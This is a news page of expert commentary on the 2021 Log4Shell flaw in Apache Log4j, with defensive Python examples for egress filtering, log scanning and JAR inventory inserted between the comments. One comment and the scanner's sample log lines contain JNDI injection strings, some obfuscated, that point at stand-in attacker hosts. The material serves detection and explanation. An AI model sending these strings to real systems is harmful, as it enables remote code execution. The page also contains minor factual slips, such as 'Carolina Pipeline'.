News recently broke of a vulnerability affecting digital systems across the internet, leaving them exposed to account takeover by hackers. Threat actors are already attempting to exploit the vulnerability, and researchers are warning of serious repercussions worldwide. The problem lies in Log4j, a ubiquitous, open-source Apache logging framework that developers use to keep a record of activity within an application. The list of services with Internet-facing infrastructure vulnerable to this critical zero-day in the Log4j logging utility is immense and includes some of the biggest names on the Internet, including Apple, Amazon, Cloudflare, Steam, Tesla, Twitter, and Baidu.

15 Expert Comments
Tim Mackey, Principal Security Strategist, Synopsys CyRC (Cybersecurity Research Center)
InfoSec Expert
December 13, 2021 10:56 am

<p>Apache log4j is the de-facto way Java applications write their log information. This means that a very large number of applications are potentially impacted by CVE-2021-44228, and we’ve already seen reports of just how easy it is to trigger the exploit. That’s the worrisome aspect of most zero-day vulnerabilities – that it’s easy to trigger and impacts a ubiquitous piece of software. In this case, exploit of CVE-2021-44228 can allow remote code to be executed, and while that’s problematic enough, the reality is there are likely other potential outcomes from an exploit – we just haven’t seen them or heard them reported. That’s because vulnerability disclosure isn’t a point in time activity. Instead, the disclosure serves as a trigger for security researchers and attackers alike to identify what other potential weaknesses the impacted code might have.</p>
<p>Protecting against exposure to CVE-2021-44228 starts with a basic element of software supply chain risk management – know the code that powers your business. If you don’t know which applications run Java and have a vulnerable version of log4j, then you can’t guarantee you’ve patched everything. If you’re relying on periodic scans of software or configurations to determine whether you’re exposed to something, then it’s time to start looking at continuous monitoring for software supply chain issues and possibly implementing automated pen-testing capabilities. After all, it’s always possible for a vulnerable version of something that should’ve been patched to be used elsewhere or by a different supplier.</p>

Kayla Underkoffler, Senior Security Technologist
InfoSec Expert
December 13, 2021 11:07 am

<p>This Zero Day highlights the threat that open source software presents as a growing portion of the world’s critical supply chain attack surfaces. Open source software is behind nearly all modern digital infrastructure, with the average application using 528 different open source components. The majority of high risk open source vulnerabilities discovered in 2020 have also existed in code for more than two years and most organizations lack direct control over open source software within supply chains to easily fix these weaknesses. Securing this often poorly funded software is an imperative for any organization that relies on it. This is why the Internet Bug Bounty was created; its mission is to secure open source by pooling funding from business partners to incentivize the discovery and reporting of vulnerabilities to open source software projects before they’re exploited. Organizations benefit by being able to have some control over increasing the security of open source by funding the research.</p>

Brian Fox, CTO and co-founder
InfoSec Expert
December 13, 2021 11:15 am

<p>This new Log4j vulnerability is likely going to be another “flashbulb memory” event in the timeline of significant vulnerabilities. It is the most widely used logging framework in the Java ecosystem. The scope of affected applications is comparable to the 2015 commons-collection vulnerability (CVE-2015-7501) because attackers can safely assume targets likely have this on the classpath. The impact is comparable to previous Struts vulnerabilities, like the one that impacted Equifax, because the attacks can be done remotely, anonymously without login credentials, and lead to a remote exploit. The combination of scope and potential impact here is unlike any previous component vulnerability I can readily recall.</p>

Andrew Howard
InfoSec Expert
December 15, 2021 9:17 am

<p>Through the recently discovered Log4Shell vulnerability, organizations can learn a lot about both vulnerability management in general and the need for secure application development more specifically.</p>
<p>The main problem is not that the Log4j library comes from an open source project run by only one or two programmers as a part-time project. In fact, a similar number of zero-day gaps can be found in commercial software as in open source solutions. The real problem is a lack of security awareness on the part of programmers and companies, which is still prevalent in many cases.</p>
<p>The vulnerability highlights that developers often blindly use libraries without carefully considering all available options. A security-conscious developer would probably have disabled the JNDI query when reading the documentation if the software does not use this feature, thus reducing the attack surface.</p>
<p>I recommend that organizations maintain a repository of libraries that are deemed secure as part of a secure DevOps process and as part of the fundamental IT security strategy of the company. The standard for all development processes then includes programmers continuously checking all libraries used in a software development project for acceptability against this repository.</p>

Ryan Weeks, CISO
InfoSec Expert
December 15, 2021 9:19 am

<p><a href="https://www.datto.com/resources/dattos-2020-global-state-of-the-channel-ransomware-report">78%</a> of MSPs report attacks against their client SMBs in the last two years alone. With that alarming stat, Datto believes we have a responsibility to identify and communicate known vulnerabilities while arming our MSP partners with the tools required to combat them.</p>
<p>In light of the Log4j vulnerability, Datto created, and is offering at no charge to Datto RMM partners, the Log4Shell Enumeration, Mitigation, and Attack Detection tool. The tool can be used to scan all JAR files on the system for signs of vulnerabilities, search TXT and LOG files on a system for a potential attack, and automatically inoculate against any future exploit attempts. Additionally, Datto has also made a script for Windows systems available to the general public that can be used in conjunction with any RMM solution to enumerate vulnerabilities, detect potential attacks, and aid in temporary inoculation.</p>

Saryu Nayyar, CEO
InfoSec Expert
December 15, 2021 9:35 am

<p>Making the rounds along with COVID over the weekend was the so-called Log4Shell vulnerability, named for the Apache Log4Shell logging utility. Exploiting it is insidiously easy – just send a malicious string to the log. Once logged, it can execute arbitrary commands.</p>
<p>We like to think of logging as part of the IT lifeblood, because it provides critical information on the health and operation of our systems and networks. To think that logs can be compromised in this way has to be disconcerting. We need to treat our utilities like logging software as critical pieces of infrastructure and monitor them just as we monitor networks and applications.</p>

Garret F. Grajek
InfoSec Expert
December 15, 2021 9:37 am

<p>The industry should applaud CyberReason for their mitigation gift to the community. Flaws like Log4Shell are intimidating and could be overwhelming for many overloaded security groups. The attack’s ability to circumvent the most important part of an Apache web site – the identity establishment page – is an exasperating event for those charged with establishing and maintaining the integrity and security of our sites. That is why the industry, like the CyberReason example, must pull together and provide the tools, for fee and for free when needed, to combat the constant threat to our internet systems on which the world, as the Carolina Pipeline showed, so deeply depends.</p>

Reuven Harrison
InfoSec Expert
December 15, 2021 9:45 am

<p>The exploit, like many others, relies on a call-home step to a command-and-control (C2) server.</p>
<p>To prevent these kinds of attacks, organizations should restrict egress (outbound) connectivity. Each subnet, server and workload should be allowed to connect only to the endpoints that are required by business. All other destinations should be blocked.</p>
<p>Blocking egress connections is easy with standard security controls such as firewalls, but defining the policy, which egress connections are allowed, is tough. Doing this properly requires continuous learning of legitimate application connectivity patterns, and enforcement in production environments.</p>

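The allowlist-based egress policy Harrison describes, worked through as an added example (this is not code from the commenter or from any product): a per-workload allowlist is learned from a baseline window of connection records, later flows are evaluated default-deny, and the `min_count` threshold illustrates why defining the policy is the hard part, since a rarely used but legitimate destination is flagged until a business rule adds it back. Workload names, hostnames, addresses and ports are all constructed, and the records are assumed to have been parsed already from firewall or flow logs.

```python
"""Learn a per-workload egress allowlist from observed connections, then flag
flows that fall outside it (default deny).

Added example for this page, not code from the commenter or from any product.
Records are (workload, destination, port, protocol) tuples, assumed already
parsed from firewall or flow logs; every value below is constructed.
"""
from collections import Counter
from typing import Dict, Iterable, List, Set, Tuple

Flow = Tuple[str, str, int, str]                 # (workload, dst_host, dst_port, proto)
Allowlist = Dict[str, Set[Tuple[str, int, str]]]  # workload -> {(dst_host, dst_port, proto)}

# Constructed learning window: what the workloads normally talk to.
BASELINE_FLOWS: List[Flow] = [
    ("web-01", "db.internal.example", 5432, "tcp"),
    ("web-01", "db.internal.example", 5432, "tcp"),
    ("web-01", "db.internal.example", 5432, "tcp"),
    ("web-01", "updates.vendor.example", 443, "tcp"),      # legitimate but seen only once
    ("batch-02", "object-store.cloud.example", 443, "tcp"),
    ("batch-02", "object-store.cloud.example", 443, "tcp"),
]

# Constructed later window: the two new destinations are the shape a call-home
# step would produce (a server reaching out to somewhere it never did before).
OBSERVED_FLOWS: List[Flow] = [
    ("web-01", "db.internal.example", 5432, "tcp"),
    ("web-01", "updates.vendor.example", 443, "tcp"),
    ("web-01", "203.0.113.42", 1389, "tcp"),                # constructed: unknown host, LDAP-style port
    ("batch-02", "object-store.cloud.example", 443, "tcp"),
    ("batch-02", "198.51.100.7", 80, "tcp"),                # constructed: unknown host
]


def learn_allowlist(flows: Iterable[Flow], min_count: int = 1) -> Allowlist:
    """Keep every (dst, port, proto) a workload used at least min_count times."""
    counts = Counter(flows)
    allow: Allowlist = {}
    for (workload, dst, port, proto), seen in counts.items():
        if seen >= min_count:
            allow.setdefault(workload, set()).add((dst, port, proto))
    return allow


def add_business_rule(allow: Allowlist, workload: str, dst: str, port: int, proto: str) -> None:
    """Explicitly permit a destination the learning window did not cover well."""
    allow.setdefault(workload, set()).add((dst, port, proto))


def evaluate(flows: Iterable[Flow], allow: Allowlist) -> List[Flow]:
    """Default deny: return every flow not covered by its workload's allowlist."""
    denied: List[Flow] = []
    for flow in flows:
        workload, dst, port, proto = flow
        if (dst, port, proto) not in allow.get(workload, set()):
            denied.append(flow)
    return denied


def render_policy(allow: Allowlist) -> List[str]:
    """Vendor-neutral policy lines: explicit allows, then a catch-all deny."""
    lines: List[str] = []
    for workload in sorted(allow):
        for dst, port, proto in sorted(allow[workload]):
            lines.append(f"allow {workload} -> {dst}:{port}/{proto}")
    lines.append("deny * -> *")
    return lines


if __name__ == "__main__":
    learned = learn_allowlist(BASELINE_FLOWS)
    print("\n".join(render_policy(learned)))
    for flow in evaluate(OBSERVED_FLOWS, learned):
        print("DENIED:", flow)
```

Raising `min_count` to 2 makes the policy stricter but also flags the once-seen vendor update host on the next window; that false positive is exactly the "defining the policy is tough" problem, and the fix is a reviewed business rule rather than loosening the default deny.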
Erka Koivunen, Chief Information Security Officer
InfoSec Expert
December 15, 2021 9:50 am

<p>It’s a design failure of catastrophic proportions. All an attacker has to do to exploit the flaw is strategically send a malicious code string that eventually gets logged by Log4j. In the simplest terms, it allows an attacker to cause the target system to fetch and run code from a remote location controlled by the attacker. The second stage – what the downloaded malicious code does next – is fully up to the attacker.</p>
<p>“Please don’t change your Tesla or iPhone name into ${jndi:ldap://url/a} unless you want unexpected user experience,” he says, half-jokingly.</p>
<p>Using Log4J’s formatting language could trigger code in vulnerable applications around the globe. Just the mention of a phrase like “${jndi:ldap://attacker.com/pwnyourserver}” in a Minecraft chat, for instance, could set off a security firestorm at Microsoft in an unpatched system.</p>

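To detect the lookup strings Koivunen quotes once they have landed in a log, here is an added example (not code from the commenter or from Log4j) that scans access-log lines for `${jndi:<scheme>:...}` and reports which scheme the target would have used to reach out. It goes beyond the plain form shown above: it URL-decodes each line and collapses the `${lower:…}`, `${upper:…}` and `${…:-default}` lookup wrappers that Log4j itself evaluates, because the same string can be written many ways and a detector that only matches the literal text misses most of what scanners actually sent. The log lines and hostnames are constructed, and the combined access-log format is an assumption.

```python
"""Flag log lines that carry a Log4j JNDI lookup string.

Added example for this page, not code from any commenter or from Log4j.
The sample lines, hosts and paths below are constructed.
"""
import re
import urllib.parse
from typing import List, Optional, Tuple

# ${jndi:<scheme>:...}; the scheme (ldap, rmi, dns, ...) is how the target would reach out.
LOOKUP_RE = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:", re.IGNORECASE)
# ${lower:x} / ${upper:x} evaluate to x in the chosen case: collapse them before matching.
WRAPPER_RE = re.compile(r"\$\{\s*(lower|upper)\s*:\s*([^${}]*)\}", re.IGNORECASE)
# ${name:-default} evaluates to the default when 'name' is unset: keep only the default.
DEFAULT_RE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")

# Constructed lines in combined access-log format (an assumption about the source).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [13/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.8 - - [13/Dec/2021:10:01:15 +0000] "GET /${${lower:j}ndi:rmi://attacker.example/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:20 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fz%7D HTTP/1.1" 200 12 "-" "-"',
    '10.0.0.10 - - [13/Dec/2021:10:01:27 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}di:ldap://attacker.example/q}"',
]


def _unwrap(match: re.Match) -> str:
    """Apply the case change a ${lower:}/${upper:} wrapper would produce."""
    inner = match.group(2)
    return inner.lower() if match.group(1).lower() == "lower" else inner.upper()


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL-encoding and lookup wrappers, repeating until the text stops changing."""
    for _ in range(max_rounds):
        new = urllib.parse.unquote(text)
        new = WRAPPER_RE.sub(_unwrap, new)
        new = DEFAULT_RE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_lookup(line: str) -> Optional[str]:
    """Return the JNDI scheme (lower-cased) if the line carries a lookup, else None."""
    match = LOOKUP_RE.search(normalize(line))
    return match.group("scheme").lower() if match else None


def scan_log(lines) -> List[Tuple[int, str, str]]:
    """Return (line number, scheme, normalized line) for every suspicious line."""
    hits: List[Tuple[int, str, str]] = []
    for number, line in enumerate(lines, start=1):
        scheme = find_lookup(line)
        if scheme:
            hits.append((number, scheme, normalize(line)))
    return hits


if __name__ == "__main__":
    for number, scheme, line in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: jndi lookup via {scheme}: {line}")
```

Reporting the normalized line rather than the raw one gives the analyst the destination the target would actually have contacted, which is what to correlate against egress logs; the normalization is bounded by `max_rounds` so a pathological line cannot keep the scanner busy.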
Asad Ali, Senior Director, Global Center of Excellence
InfoSec Expert
December 16, 2021 11:08 am

<p>Time is of the essence to mitigate the Log4Shell vulnerability in the Apache log4j 2 library. Given that this vulnerability allows a malicious attacker to execute any command on a vulnerable Java process, it’s crucial to prioritize fixing it in Java processes that are accessible directly from a browser, mobile device, or application programming interface (or API) call.</p>

Charles Carmakal, SVP and CTO
InfoSec Expert
December 16, 2021 11:45 am

<p>CVE-2021-44228 is one of the most pervasive security vulnerabilities that organizations have had to deal with over the past decade. Organizations are challenged with identifying all of the vulnerable Log4j instances across their enterprise. Patching isn’t trivial. Many vendors are still determining whether their software uses Log4j, as organizations eagerly wait to know if they should apply emergency patches. Closed box systems, vendor-managed systems, and software that’s no longer maintained (but still running in test or even production environments) add to the complexity and pain.</p>
<p>Organizations need to think about several key things as they work to tackle this problem:</p>
<ol>
<li>They need to discover the systems and applications that use Log4j (which may include secondary and tertiary systems that data is passed to).</li>
<li>They need to apply patches where they can.</li>
<li>They need to anticipate that they may never find all vulnerable instances, so they should apply mitigations across the enterprise to reduce the exploitability and impact of attempts.</li>
<li>They need to assess/manage the risk of their vendors and partners.</li>
<li>They need to determine if instances have already been exploited and then investigate it accordingly.</li>
</ol>
<p>The slightly positive news is that most exploitation observed so far is automated in nature, which means responses and investigations will be relatively easier. But there’s so much noise right now – and separating the noise from the deliberate and targeted intrusions can be difficult.</p>

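Carmakal's first step, discovering where Log4j is deployed, is the one most teams struggled with because log4j-core is usually buried inside other archives. The following added example (not code from the commenter or from Apache) walks a directory tree, opens every JAR/WAR/EAR, recurses into archives nested inside them, and reports each one that still contains `org/apache/logging/log4j/core/lookup/JndiLookup.class`, reading the version from the JAR's Maven `pom.properties` where one is bundled. The fixture archives it builds for the demo are constructed, and the `2.x-SAMPLE` version string is a placeholder rather than a real release.

```python
"""Inventory archives that bundle Log4j's JndiLookup class.

Added example for this page, not code from any commenter or from Apache.
It walks a directory, opens every .jar/.war/.ear/.zip, descends into archives
nested inside them (fat JARs, WEB-INF/lib) and reports each one that contains
the class the JNDI lookup lives in. The fixtures it builds are constructed.
"""
import io
import os
import tempfile
import zipfile
from typing import Dict, List, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")

Finding = Tuple[str, str]  # (archive path, with '!' separating nested members; version or "unknown")


def _read_version(zf: zipfile.ZipFile) -> str:
    """Pull the version= line from log4j-core's Maven pom.properties, if bundled."""
    if POM_PROPERTIES not in zf.namelist():
        return "unknown"
    for raw in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
        if raw.startswith("version="):
            return raw.split("=", 1)[1].strip()
    return "unknown"


def inspect_archive(data: bytes, label: str, findings: List[Finding]) -> None:
    """Record this archive if it holds JndiLookup.class, then descend into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # corrupt or misnamed file; not a zip container
    names = zf.namelist()
    if JNDI_LOOKUP_CLASS in names:
        findings.append((label, _read_version(zf)))
    for name in names:
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            inspect_archive(zf.read(name), f"{label}!{name}", findings)


def scan_tree(root: str) -> List[Finding]:
    """Walk root and return every outer or nested archive that still contains JndiLookup."""
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            if filename.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, filename)
                with open(path, "rb") as fh:
                    inspect_archive(fh.read(), path, findings)
    return sorted(findings)


def _zip_bytes(entries: Dict[str, bytes]) -> bytes:
    """Build an in-memory zip from {member name: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_demo_tree() -> str:
    """Create a temp dir of constructed fixtures: a log4j-core JAR with the class,
    one with the class removed (the interim mitigation), and a WAR nesting the first."""
    root = tempfile.mkdtemp(prefix="log4j-inventory-demo-")
    props = b"version=2.x-SAMPLE\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n"  # constructed placeholder
    class_bytes = b"\xca\xfe\xba\xbe"  # placeholder class-file magic, constructed
    with_class = _zip_bytes({JNDI_LOOKUP_CLASS: class_bytes, POM_PROPERTIES: props})
    class_removed = _zip_bytes({"org/apache/logging/log4j/core/Logger.class": class_bytes, POM_PROPERTIES: props})
    war = _zip_bytes({"WEB-INF/web.xml": b"<web-app/>", "WEB-INF/lib/log4j-core.jar": with_class})
    fixtures = {
        "lib/log4j-core-vulnerable.jar": with_class,
        "lib/log4j-core-classremoved.jar": class_removed,
        "webapps/app.war": war,
    }
    for rel, data in fixtures.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for path, version in scan_tree(build_demo_tree()):
        print(f"{path}: log4j-core {version} still ships JndiLookup.class")
```

Keying the report on the presence of the class rather than on the file name or version string is deliberate: a JAR whose class was removed as the interim mitigation drops out of the report, while a renamed or repackaged copy is still found.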
Nicholas Luedtke, Principal Analyst
InfoSec Expert
December 16, 2021 12:09 pm

<p>Log4j is a library that is built into the logging functionality of a very large part of the internet. It is embedded/used by a ton of software that runs websites, clouds, security services, games, etc. Because logs are important for security, debugging, and audit trails, it is very common for some part of user controlled data to go directly into log files. Those two aspects, coupled with the trivial nature of exploitation of this vulnerability, make it very serious.</p>
<p>Attackers only need to find a vector by which they can cause a crafted string to be inserted into a logfile of a vulnerable system. Once they have achieved that, the impacts to an enterprise can be wide. Obviously they could gain a foothold on the victim’s network; that foothold may be privileged if the product that was compromised was an administrative or security component. They can also leak environment variables from the compromised systems, which can lead to credentials being leaked (if they are stored in an environment variable). Additionally, because of the embedded nature of this library into other software, as a consumer, it is very difficult to tell what products you have in your environment that might be using it. If you can’t do that first task quickly or completely, mitigation becomes very difficult.</p>

Jeff Williams, CTO and Co-founder
InfoSec Expert
December 16, 2021 12:31 pm

<ol>
<li><strong>Make sure that your security operations center is actioning every single alert on the devices that fall into the category above:</strong> “There are a wide range of methods hackers can use to access personal information through Log4j’s vulnerability. The human effort required to detect and action each event is simply unrealistic.”</li>
<li><strong>Install a web application firewall (WAF) with rules that automatically update, so that your SOC can concentrate on fewer alerts:</strong> “Firewalls aren’t going to stop hackers. They still have plenty of other ways to break into organizations’ systems through Log4j, which are undetectable by the firewall. This includes malicious code embedded into JSON, XML, and other common data structures that power nearly every website and application.”</li>
<li><strong>Enumerate any external facing devices that have Log4j installed:</strong> “The focus on ‘external facing’ devices is a mistake, as many internal systems also log data that originated from an untrusted source.”</li>
</ol>

Joel Belafa, Director of Engineering Business Solutions
InfoSec Expert
December 20, 2021 12:10 pm

<p>The Log4Shell data breach is making a considerable industry impact as the attack opens doors to every other type of possible cyber threat. If the attack isn’t contained as soon as possible, there is a risk of wider implications. We therefore need to be prepared for multiple waves of attacks.</p>
<p>To exploit Log4shell, you only need a basic understanding of Java technology. So, in theory, there are seven million people capable of performing such an attack. The scale of this attack is also unpredictable as the effort-to-benefits ratio of Log4shell is unprecedented. We could safely assume that many organisations already have their systems compromised by malware or attacks that are yet to be identified.</p>
<p>What this attack does highlight is the industry’s demand for new AI-driven ways to fight against cyberattacks by bringing machine learning to Web application firewalls. One of the scenarios commonly worked on is anomaly detection on logs at scale. However, even the companies that invested in modernising their log analytics still have a way to go in battling such sophisticated attacks.</p>
<p>Any breach stemming from Log4shell (or similar) will still require teams to reprovision and reinstall every affected environment, and to drive a full investigation into all affected systems. At present, the method to contain such an attack requires a high level of tools and automation that are typically reserved for cyber defence pure players. Companies need to level up and engage with sophisticated AI tools to bolster their cybersecurity defences.</p>

Anurag Gurtu, CPO
InfoSec Expert
December 20, 2021 12:15 pm

<p>Are we witnessing a match made in heaven? Apparently, a ransomware attack is currently exploiting the Log4Shell vulnerability. It’s the Khonsari ransomware gang who has built an attack using C# and the .NET framework.</p>
<p>After execution, the malware enumerates all mounted drives (other than C:/) and targets user directories including Documents, Videos, Pictures, Downloads, and Desktop. An AES 128 CBC algorithm is used for encryption, and the files are saved with a .khonsari extension.</p>
<p>There are no signs that the Log4Shell vulnerability is slowing down, in fact a second CVE (CVE-2021-45046) just got announced. In the second and third stages, threat actors are aggressively deploying malware families. Among them are Kinsing, XMR, and Mirai. Additionally, some coin-miners and CobaltStrike beacons have been observed in the wild. Nearly 2000 malicious IOCs have been observed so far, which require immediate attention.</p>

Information Security Buzz